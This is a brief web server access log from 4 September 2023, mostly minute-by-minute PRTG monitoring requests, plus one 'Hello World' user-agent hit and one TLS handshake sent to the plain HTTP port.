212.91.246.72 - - [04/Sep/2023:11:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:11:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:12:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [04/Sep/2023:12:01:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [04/Sep/2023:12:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:12:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:12:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:12:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:12:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:12:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.1.77 - - [04/Sep/2023:12:07:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
